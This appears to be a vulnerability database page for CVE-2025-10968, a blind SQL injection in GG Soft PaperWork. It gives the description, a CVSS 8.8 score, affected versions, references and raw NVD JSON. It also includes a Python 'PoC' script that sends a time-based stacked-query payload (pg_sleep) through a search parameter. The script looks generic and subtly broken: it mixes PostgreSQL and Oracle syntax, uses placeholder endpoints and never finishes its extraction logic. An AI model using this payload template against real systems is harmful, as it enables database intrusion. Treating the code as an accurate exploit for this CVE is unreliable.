CVE-2025-10968

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 564 - SQL Injection: Hibernate vulnerability in GG Soft Software Services Inc. PaperWork allows Blind SQL Injection, SQL Injection.This issue affects PaperWork: from 6.1.0.9390 before 6.1.0.9398.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PaperWork 6.1.0.9390

PaperWork 6.1.0.9391

PaperWork 6.1.0.9392

PaperWork 6.1.0.9393

PaperWork 6.1.0.9394

PaperWork 6.1.0.9395

PaperWork 6.1.0.9396

PaperWork 6.1.0.9397

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import time # CVE-2025-10968 PaperWork Blind SQL Injection PoC # Target: PaperWork < 6.1.0.9398 # Type: Time-based Blind SQL Injection TARGET_URL = "http://target.com/paperwork/api/endpoint" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Login to obtain session token""" session = requests.Session() login_data = { "email": USERNAME, "password": PASSWORD } response = session.post(f"{TARGET_URL}/auth/login", json=login_data) return session if response.status_code == 200 else None def extract_data(session, sql_payload): """Extract data using time-based blind SQL injection""" # Sleep for 5 seconds if condition is true payload = f"'; SELECT CASE WHEN ({sql_payload}) THEN pg_sleep(5) ELSE pg_sleep(0) END--" data = {"search": payload} start_time = time.time() response = session.get(f"{TARGET_URL}/search", params=data) elapsed = time.time() - start_time return elapsed > 4 def extract_version(session): """Extract database version""" sql = "SELECT version FROM v$version WHERE rownum=1" return extract_data(session, sql) def main(): session = login() if not session: print("[-] Login failed") return print("[+] Login successful") print("[*] Extracting database information...") # Add extraction logic here print("[+] Done") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10968
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10968
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10968/
[4] VulDB https://vuldb.com/cve/CVE-2025-10968
[5] https://www.usom.gov.tr/bildirim/tr-25-0381

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10968", "sourceIdentifier": "[email protected]", "published": "2025-11-07T13:15:38.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), CWE - 564 - SQL Injection: Hibernate vulnerability in GG Soft Software Services Inc. PaperWork allows Blind SQL Injection, SQL Injection.This issue affects PaperWork: from 6.1.0.9390 before 6.1.0.9398."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0381", "source": "[email protected]"}]}}